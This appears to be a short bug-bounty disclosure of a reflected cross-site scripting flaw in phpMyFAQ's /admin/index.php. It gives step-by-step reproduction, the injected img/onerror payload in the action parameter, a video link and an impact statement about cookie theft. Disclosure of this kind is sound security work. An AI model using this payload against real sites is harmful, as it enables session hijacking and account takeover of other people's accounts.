Reflected XSS in /admin/index.php in thorsten/phpmyfaq
Reported on
Sep 30th 2023
Description
Description I noticed, your website is very secure. But you overlooked a flaw XSS
Proof of Concept
- Step 1: Access the demo website
- Step 2: Access
admin/index.php?action=ngductung"><img src/onerror="alert('XSS')
Payload:
ngductung"><img src/onerror="alert('XSS')
- Step 3: Detect XSS
Video PoC
https://ngductung-my.sharepoint.com/:v:/g/personal/ngductung_ngductung_id_vn/EcbTzZBsrXZBuZdf2aScnQ0BOWeP44cBiTwnpDIoV79aOQ?nav=eyJyZWZlcnJhbEluZm8iOnsicmVmZXJyYWxBcHAiOiJPbmVEcml2ZUZvckJ1c2luZXNzIiwicmVmZXJyYWxBcHBQbGF0Zm9ybSI6IldlYiIsInJlZmVycmFsTW9kZSI6InZpZXciLCJyZWZlcnJhbFZpZXciOiJNeUZpbGVzTGlua0RpcmVjdCJ9fQ&e=Zqdo9L
Impact
This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...